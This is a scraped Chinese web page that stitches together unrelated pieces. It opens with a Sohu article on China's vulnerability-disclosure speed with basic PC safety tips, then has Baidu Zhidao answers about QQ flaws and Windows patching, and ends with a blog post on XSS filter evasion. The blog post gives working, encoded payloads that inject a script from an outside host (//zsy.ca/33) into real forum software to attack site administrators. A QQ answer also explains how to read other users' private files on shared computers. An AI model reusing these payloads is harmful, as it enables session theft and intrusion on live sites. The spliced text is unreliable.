中国发现网络安全漏洞到底有多快？网友：没多快，就甩美国20条街吧！
在大家的印象中，安全漏洞，网络攻击，病毒值入等专业黑客行为是不是只发生在电影里面？
如果你真这样以为的话就大错特错了，虽然大家可能都没有发现过自己电脑被攻击的情况，但是这并不意味着大家的电脑没有被攻击过，中个网络病毒、突然间上网上得好好的就断了……像这样的情况肯定大家都遇到过，虽然不一定都是被网络攻击造成的，但是这也是一种黑客行为！这样一说，大家会不会就觉得黑客行为离我们很近了呢？
那么黑客行为是怎么发起的呢？一般来说都会首先找到你的电脑漏洞，因为不通过漏洞正常电脑都是有保护措施的，并不容易攻破你的电脑防线，但是有了漏洞就不同了，黑客们就可以利好电脑系统本身的漏洞，或者是一些软件漏洞，偷偷的进入你的电脑，至于要在你电脑做什么事，那就不得而知了！就像一个小偷发现你家本该上好锁的门，结果锁生锈了没锁上，那么他就可能偷偷的潜入你家了。
正常来说漏洞都是不小心出现的，在大家的心目中，美国是发达国家，科技水平应该远远超过中国人民，再加上美国又是电脑系统的出口大国，大家用的windows系统都是美国的微软公司的开发出来的，按理说美国应对黑客攻击应该比我们要好，但是事实却不一定是这样的，至少在发现网络安全漏洞速度上中国要比美国快，而且平均起来不是快一点点，而是快了20天！据美媒称，阿帕奇软件基金会发现了其软件中的一个巨大瑕疵，黑客利用这个瑕疵可以轻松获取1.45亿美国人的私密信息！而在防范黑客攻击上，中国公司则领先了一步，在阿帕奇宣布这个信息一天内，中国国家安全信息漏洞库（CNNVD）就知道了这个漏洞的详细内容，而三天后它才出现在美国的官方数据库中，那时研究人员已经记录到全球各地黑客利用这个瑕疵的大量袭击记录。根据网络公司“记录未来”公司发表的研究报告，中国在这方面的优势巨大，根据2年来的漏洞分析记录，中美公布新发现漏洞信息的时候平均相距20天！
随着中国网络化程度逐日加强，网络攻击已经成为了大家生活中的一部分，可能大家并没有感觉到自己家的电脑被攻击了，一方面是因为360管家、QQ管家等电脑防护软件帮大家挡住了一般的网络攻击，另一方面是因为你的电脑可能对黑客没有太大的价值，如果你电脑内有国家机密内容，相信会有一大波的攻击针对你！不管怎么说，电脑毕竟是私人物品，非法进入总是不道德的，而作为电脑的主人，我们自己也应该加强防范意识。下面就给大家一些加强电脑安全的小建议：
1. 安装防护软件，不过是360管家还是QQ管家都可以，千万不要让电脑“裸奔”不然哪怕你不上网，也有可能中病毒；
2. 及时更新漏洞，当系统有漏洞需要更新，特别是严重漏洞的时候更需要及时更新！很多人不喜欢更新系统，因为用的是盗版系统嘛，这往往就给黑客留下了可乘之机；
3. 不使用来历不明的程序，所谓好奇害死猫，很多人就是因为打开了一个来路不明的病毒文件而让自己的电脑瘫痪的，在不知道软件的实际功能前不要随便去用；
4. 不上一些危险网站，很多时候可能大家都不小心进入到一个钓鱼网站，一个不小心就把自己的帐号、密码等私密信息被人家知道了，所以千万不要在一个不明网站留下私密信息；
5. 尽量用正版软件，由于中国的版权保护意识还不是很强，大家都喜欢用免费的，很多时候为了不付钱往往使用盗版的软件，这其实也存在风险，这些软件很可能就会被某些用心不良之人加入了非法程序。
本文为“塑如意生活”自媒体号原创文章，转载请注明出处，否则将追究相关法律责任，如需转载授权请联系“塑如意生活”认证公众号。
塑如意生活∣一个懂生活的公众号
责任编辑：
声明：该文观点仅代表作者本人，搜狐号系信息发布平台，搜狐仅提供信息存储空间服务。
东莞私人影院
东莞智能系统
今日搜狐热点这个赌局的漏洞在哪里？ - 知乎420被浏览<strong class="NumberBoard-itemValue" title="0,129分享邀请回答2921 条评论分享收藏感谢收起3添加评论分享收藏感谢收起QQ到底有哪些漏洞？_百度知道
QQ到底有哪些漏洞？
我有更好的答案
QQ有很多的漏洞，其中有些还是非常致命的，这里就两个最为常见的漏洞说明。 一、出现特大号的字体 我们知道，QQ最大字号为22号，但如果我们的一个好友给你发个180号的字，相信很多朋友都会目瞪口呆的。当然了，这种特大号的字体，不是随便就能发送的，它是通过代码实现的。 防范：这种特大字体其实就是Win 9X/2000/XP下的riched20.dll文件中存在的一个缓冲区溢出漏洞，该漏洞可导致使用此DLL模块相应功能的应用程序崩溃，当字体大小数字串长度超过32字节时，就会引起缓冲区溢出，当超过34字节以后就有可能会导致应用程序崩溃。好友发来的特大字体只不过是用来玩玩的，倒不会对系统造成影响，并且这种攻击要对方在对话框模式才管用，好好地在普通模式下就安全了。 二、窥探会员收藏夹 在QQ上还有一串呢称为红色的家伙，据说都是些会员，做会员有个好处，就是不仅能用代理，还有网络收藏夹和网络备忘录等功能，会员的网络收藏夹和备忘录里面可都是些好东东，想想看，毕竟申请会员是要付费的嘛，不是特别重要，谁愿意把钱扔掉，所以会员的这二样功能记录的东东绝对是有价值的，这些东东看得到吗？笔者的回答是肯定的，瞅准了哪个会员在网吧用过一下机器，然后走掉了，机会不就来了嘛。寻找到QQ目录的FavorDoc和Notes文件，如果对方破解了你的这两个文件，就可以尽情饱览了。 防范：腾讯的QQ会员会在安装目录里多出一个FavorDoc文件，在FavorDoc文件中记录的就是会员的网络收藏夹记录的网站，并且在Notes文件里记录会员的备忘录，本来这二样东东都是上传在腾讯提供的服务器中，怎么会出现在本地文件中呢？这可以算是会员功能的漏洞，不过要防范它也很容易。那就是暂时停用会员QQ的网络收藏夹和网络备忘录的功能，或者用其它的方式来记录这些东西，或者在多人使用的机器里，下网走人前删除自己的QQ号码，删除自己那个号的文件夹，并且在回收站里也清空掉。
采纳率：54%
为您推荐：
其他类似问题
&#xe675;换一换
回答问题，赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。360发现的漏洞有没有必要修复_百度知道
360发现的漏洞有没有必要修复
我的系统是win7旗舰版盗版，已激活。360发现的系统漏洞有没必要修复？人家买电脑的再三叮嘱的不要让我修复这是为什么？修复以后有什么后果？回答的详细一点。
我有更好的答案
从系统安全角度讲，有必要修复，如果不想修复可以关闭。1、打开安全卫士，选择系统修复。2单击下面的设置按钮——进入设置界面。将扫描提示方式改为开机不扫描高危漏洞。单击确定。
网络工程师
卖电脑的再三叮嘱的不要让你修复是怕系统更新程序window Update的修复，window Update更新修复会进行检测系统正版验证 盗版不会通过的然后会一直提示不是正版 桌面没有背景等其他限制。360发现的系统漏洞应该可以修复因为这是第三方软件修复，360没有义务帮着微软搞用户 而且如果360用户修复之后出现各种问题对360本身也是麻烦，会增加用户厌烦度后果会很不好。所以他只会下载修复对系统和用户重要的更新
本回答被提问者和网友采纳
系统的漏洞补丁全是微软的
360只是推送而已
安装有安装的好处
我觉得也没必要安装
安装多了电脑会慢
一些不兼容的补丁也会弄坏电脑
自己选择吧
我是全安了
那就听卖电脑的吧，不修复也没什么，我就没修复过
其他1条回答
为您推荐：
其他类似问题
&#xe675;换一换
回答问题，赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。最近认识了个新朋友，天天找我搞XSS。搞了三天，感觉这一套程序还是很有意思的。因为是过去式的文章，所以没有图。但是希望把经验分享出来，可以帮到和我一样爱好XSS的朋友。我个人偏爱富文本XSS，因为很有趣。有趣的地方是你需要一点一点的测试都过滤了些什么，怎么过滤的。我想，这也是黑盒测试最让人着迷的地方吧&&&&首先，锁定了提交问题的模块，因为这块有编辑器。然后开始fuzz filter规则。一共有两个输入点：标题,内容&&我一般喜欢从内容入手，因为这块没有长度限制。一开始先一个一个测试一些可以用来XSS攻击的标签。
&script&&a&&p&&img&&body&&button&&var&&div&&iframe&&meta&&object&&marquee&&isindex &&input&&select&&&keygen&&frameset&&embed&&svg&&math&&video&&audio&&textarea
经过一系列测试之后，发现存活的只有&img&和&a&标签。这就比较尴尬了。这种情况下一般能用起来的，属性也就几个了onload,onerror,onmouseover,onclick和href&&理清思路之后开始第二轮的测试，就是属性测试:
&img onerror onload onmouseover src=x&
onmouseover
测试后发现，这几个好用的on事件都被过滤了。然而程序员为了防止插入&script&把scr给过滤了,所以href里面也不可能再写伪协议来执行XSS了。&&搞到这的时候，心想搞个data URI（&a href=data:text/base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4=&求助&/a&）就算了。起码FF下还会继承当前域。不过基友不愿意啊。想了想也是这是打后台，只能搞一些通杀的XSS，不然不白扯么。然后回过头来看了下标题。还是上面的测试流程。意外的发现标题出居然没有对img标签进行过滤，属性种只有onload没有被过滤。接着先试了下
&img src=站内有效图片地址 onload=document.write(123)&
被拦截了。又蛋疼的测试了一会儿后发现document被过滤了。好吧&&转成unicode，继续绕:
&img src=站内有效图片地址 onload=\u0064ocument.write(123)&
这下过了，不过把页面给毁了。呵呵，人嘛 总有那么几天会犯傻逼。重新注册个帐号。心想这次要一次搞定，所以还是避免单引号吧，就写了个:
&img src=站内有效图片地址 onload=\u0064ocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62))&
很好，又被拦截了。测试了很长时间终于没有耐心了（这个标题有字数限制，如果不找到过滤的字符，而是整篇都转了，长度会不够）。发现Char被过滤了（一看就是把防注入和防XSS写一块儿了。屌丝何必难为屌丝&&），不像再走这条路了。换个姿势:
&img src=有效图片 onload="\u0064ocument.write('&sc'+'ript src=//zsy.ca/33&&/sc'+'ript&')"&
终于写好了一个没有document,没有char，没有scr的payload，再多两个字就插不进去了。写好了通用的payload后，发给了基友，过一天。他又M我说，有一个一样的站，不过搞不定。
不知道为什么一套程序会有这么多变异版本。这次的情况更有趣了。内容插入的标签都被HTMLEncode了。标题处已经不能再插img标签了。心想估计是升级版吧。结果他说没事儿，我知道这个不能搞，搞不定就算了。换谁谁都怒了。继续用前面的方式，fuzz标题处允许的标签，fuzz出来4个:&&&img& &div& &style& &a&& &开始做属性测试，还是上面那一套方法，发现&p onmouseover&没有问题，那上面的payload改了一改。
&p onmouseover="\u0064ocument.write('&sc'+'ript src=//zsy.ca/33&&/sc'+'ript&')"&
发给他就睡觉了。结果第三天，他又搞了一个站说前面两个方法都不行。真是奇怪了。这奇葩程序到底是谁在维护,f4ck it.这次更有趣了。标题和内容都被HTMLencode了，而且编辑器直接被去掉了。不过这次多了个功能。叫上传图片。其实搞到这儿的时候，已经很累了。不过放弃不是我性格，只能接着搞了。这是我最喜欢linux的一点，因为文件名的命名规则没有win那么矫情。搞了个图片，名称改成:
&img src=x onerror=confirm()&.png
由于是新功能。程序员没有对文件名进行htmlencode直接输出在了页面，小框框再一次弹起。舒服多了&& 不过又有新的问题了。由于是文件上传，所以我们的payload中不能出现，"/" 我觉得应该是会被认成filepath然后就被截断了。再换个姿势:
&svg onload=\u0064cument.write(String.from\u0043harCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62))
没有scr,没有Char，没有document,没有&/&的姿势就算写好了。&&到这儿还没完。还有1个呢。后面他又给我发了个变异版本。说能插进去却执行不了。拿过来网站后看了下。好家伙，这次更好玩了。之前的三个站，标题的长度限制都是100(不是客户端验证，是在定义数据库字段的时候，做了限制)。这次的长度只有35，payload后面的部分都被吃掉了。目测数据库那块儿没变，但是在PHP端，做了限制。还多了个安全宝（要不要这样？）别的还好拆。这onmouseover拆成10个20个的，让人一个一个划过去，这心里边没底啊。只能找别的payload了。这次也累了，就随便试了一下:
&img onAbort onActivate onAfterPrint onAfterUpdate onBeforeActivate onBeforeCopy onBeforeCut onBeforeDeactivate onBeforeEditFocus onBeforePaste onBeforePrint onBeforeUnload onBeforeUpdate onBegin onBlur onBounce onCellChange onChange
onClick onContextMenu onControlSelect onCopy onCut onDataAvailable onDataSetChanged onDataSetComplete onDblClick onDeactivate onDrag onDragEnd onDragLeave onDragEnter onDragOver onDragDrop onDragStart onDrop onEnd onError onErrorUpdate onFilterChange onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver onMouseUp onMouseWheel onMove onMoveEnd onMoveStart onOffline onOnline onOutOfSync onPaste onPause onPopState onProgress onPropertyChange onReadyStateChange onRedo onRepeat onReset onResize onResizeEnd onResizeStart onResume onReverse onRowsEnter onRowExit onRowDelete onRowInserted onScroll onSeek onSelect onSelectionChange
02.onSelectStart onStart onStop onStorage onSyncRestored onSubmit onTimeError onTrackChange onUndo onUnload onURLFli formaction action href xlink:href autofocus src content data from values to
发完贴之后变成了:
&img onAbort=""&
一时没搞明白是什么情况，随后试了一下:
&img src=x onerror=confirm()&
01.&img src=x&
原来是在发现一个以上的空格时，会从第二个空格开始把后面内容都过虑了。这就好弄了。换空格的法儿就多了，祭出Hexeditor，把第二个空格换成0x0C:
保存后，复制payload：
&img src=x[0x0C] onerror=confirm()&
我的乖乖终于弹起来了。综合考虑，前面的那些被过滤的字符(document,scr,char,"/")，打算还是转成8进制算了。反正拆完的内容最后还要eval一下。就有了:
01.&img onerror=a='\144\157' src=x&
02.&img onerror=a+='\143\165' src=x&
03.&img onerror=a+='\155\145' src=x&
04.&img onerror=a+='\156\164' src=x&
05.&img onerror=a+='\56\167' src=x&
06.&img onerror=a+='\162\151' src=x&
07.&img onerror=a+='\164\145' src=x&
08.&img onerror=a+='\50\47' src=x&
09.&img onerror=a+='\74\163' src=x&
10.&img onerror=a+='\143\162' src=x&
11.&img onerror=a+='\151\160' src=x&
12.&img onerror=a+='\164\40' src=x&
13.&img onerror=a+='\163\162' src=x&
14.&img onerror=a+='\143\75' src=x&
15.&img onerror=a+='\57\57' src=x&
16.&img onerror=a+='\172\163' src=x&
17.&img onerror=a+='\171\56' src=x&
18.&img onerror=a+='\143\141' src=x&
19.&img onerror=a+='\57\63\6' src=x&
20.&img onerror=a+='3\76\74' src=x&
21.&img onerror=a+='\57\163\1' src=x&
22.&img onerror=a+='43\162\15' src=x&
23.&img onerror=a+='1\160\164' src=x&
24.&img onerror=a+='\76\47\51' src=x&
25.&img onerror=eval(a) src=x&
插入的时候，倒序插入（因为帖子会按照时间顺序来呈现）。最后就算搞定了。感觉是次很有趣的经历。虽然有点长但耐心读完应该还是有帮助的。虽然不是什么碉堡的程序，但是国内有很多家***都在用这套。所以不方便透漏是哪一套。如果你知道是哪一套，也希望你不要说出来.
阅读(...) 评论()